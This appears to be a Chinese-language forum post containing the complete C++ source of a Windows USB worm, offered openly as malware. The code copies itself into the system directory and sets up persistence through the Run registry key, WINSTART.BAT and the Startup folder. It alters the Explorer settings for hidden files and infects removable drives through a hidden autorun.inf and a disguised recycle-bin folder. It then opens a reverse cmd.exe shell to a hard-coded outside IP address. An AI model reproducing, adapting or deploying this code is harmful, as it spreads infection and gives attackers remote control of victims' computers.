当然不是我写的,但会仿写:
// MyVirus2.cpp : Defines the entry point for the application.
//
// MyVirus1.cpp : Defines the entry point for the application.
//
// WindowsXP2.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <iostream.h>
#include <mmsystem.h>
#include <process.h>
#include <winsock2.h>
#pragma comment(lib,"Ws2_32")
void InitData();
void VirusFunc();
bool Checkdisk();
void Scandisk();
//void ClipCursorr();
LRESULT CALLBACK keyproc(int code, WPARAM wParam, LPARAM lParam)
{
//MessageBox(NULL, "1", "HOOK", MB_OK);
return 1;
}
char szDriverName[4] = {0};
char szTmp[MAX_PATH] = {0};
char USB = 0;
void InitData()
{
sprintf(szDriverName, "C:\0");
ZeroMemory(&szTmp, sizeof(szTmp));
}
//病毒特征:拷贝本身到系统目录下并执行
//修改注册表启动项
//在U盘中建立recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}、autorun.inf文件
//把启动内容写入autorun.inf文件
//加入一些控制电脑的语句
void VirusFunc()
{
HKEY key;
char szPath[MAX_PATH] = {0};
char szName[MAX_PATH] = "mianhou.exe";
GetModuleFileName(NULL, szPath, MAX_PATH);
GetSystemDirectory(szTmp, MAX_PATH);
lstrcat(szTmp, "\\");
lstrcat(szTmp, szName);//由U盘感染电脑,szPath是病毒路径,szTmp是感染电脑后病毒的位置
if ( lstrcmpi(szTmp, szPath))
{
CopyFile(szPath, szTmp, false);
Sleep(500);
WinExec(szTmp,SW_HIDE);
}//拷贝本身到系统目录下并执行
//szTmp[2] = '\0';
//lstrcat(szTmp, "WINDOWS");
char szTmp1[MAX_PATH];//szTmp1是windows目录下的WINSTART.BAT文件,修改该文件使病毒成为自启动
char szTmp2[MAX_PATH];
sprintf(szTmp1,"c:\\WINDOWS\\WINSTART.BAT");
//CreateFile(szTmp1, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, 0, 0);
FILE *bat;
bat = fopen(szTmp1,"w+");
fprintf(bat,"@ c:\\WINDOWS\\system32\\mianhou.exe\n");//病毒自启动
lstrcpy(szTmp2, "c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mianhou.exe");
CopyFile(szPath, szTmp2, false);//修改启动项
DWORD dw;
if ( RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 0L, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &dw) == ERROR_SUCCESS)
RegSetValueEx(key, "1", 0, REG_SZ, (BYTE *)szTmp, lstrlen(szTmp));
RegCloseKey(key);//修改注册表启动项
DWORD mianhou1 = 0;
DWORD mianhou2 = 2;
Sleep(10000);
DWORD dwSize = 2550;
char szString[2550];
DWORD dwType;
if( RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &key) == ERROR_SUCCESS)
{
long lReturn = RegQueryValueEx(key, "ShowSuperHidden", NULL, &dwType, ( BYTE *)&szString, &dwSize);
if(lReturn == 1)
{
mianhou1 = 0;
RegSetValueEx(key, "ShowSuperHidden", 0, REG_DWORD, (CONST BYTE *)&mianhou1, sizeof(DWORD));
}
}
if( RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &key) == ERROR_SUCCESS)
{
long lReturn = RegQueryValueEx(key, "Hidden", NULL, &dwType, ( BYTE *)&szString, &dwSize);
if(lReturn == 1)
{
mianhou2 = 2;
RegSetValueEx(key, "Hidden", 0, REG_DWORD, (CONST BYTE *)&mianhou2, sizeof(DWORD));
}
}
//从主机感染U盘,产生2个文件,分别是autorun.inf文件和recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}目录,将病毒拷贝到其目录中
HANDLE FileHandle;
char FileName[MAX_PATH];//FileName是autorun.inf的位置
char FilePath[MAX_PATH];//FilePath是U盘中recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}的位置
char ExePath[MAX_PATH];//ExePath是U盘中mianhou.exe的位置
lstrcpy(FilePath, &USB);//得到U盘的盘符
lstrcat(FilePath, ":\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}");
CreateDirectory(FilePath, NULL);//建立文件夹
lstrcpy(ExePath, FilePath);
lstrcat(ExePath, "\\mianhou.exe");
CopyFile(szTmp, ExePath, true);//将病毒从电脑主机拷贝到U盘的recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}中
lstrcpy(FileName, &USB);
lstrcat(FileName,":\\autorun.inf");
FileHandle = CreateFile(FileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, 0, 0);//在U盘根目录下建立autorun.inf文件
//FileHandle = CreateFile(FileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0);
char FileContent[MAX_PATH] = "[autorun] \n open=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe \n Shell\\1=&打开(O) \n Shell\\1\\Command=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe \n Shellexecute=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe";
DWORD nWrite;
WriteFile(FileHandle, FileContent, MAX_PATH, &nWrite, NULL); //写入autorun.inf的内容
SetFileAttributes(FileName, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
SetFileAttributes(FilePath, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);//设置autorun.inf文件和recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}目录的属性为系统、只读和隐藏
WSADATA ws;
SOCKET s;
int ret;
WSAStartup(MAKEWORD(2,2), &ws);
s = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(830);
server.sin_addr.s_addr = inet_addr("28.53.217.111");
connect(s, (struct sockaddr *)&server, sizeof(server));
STARTUPINFO si;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;
char cmdLine[] = "cmd.exe";
PROCESS_INFORMATION ProcessInformation;
ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &si, &ProcessInformation);
}
bool Checkdisk()
{
szDriverName[0] = 'C';
for ( szDriverName[0]='C'; szDriverName[0]<'Z'; szDriverName[0]++)
{
if (GetDriveType(szDriverName) == DRIVE_REMOVABLE)
{
USB = szDriverName[0];
return true;
}
}
return false;
}
void Scandisk()
{
while(!Checkdisk())
{
//cout<<"1\n";
Sleep(10000);
}
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InitData();
Scandisk();
//::mciSendString("set cdaudio door open", NULL, 0, NULL);
//::mciSendString("set cdaudio door closed wait", NULL, 0, NULL);
VirusFunc();
//ClipCursorr();
return 0;
}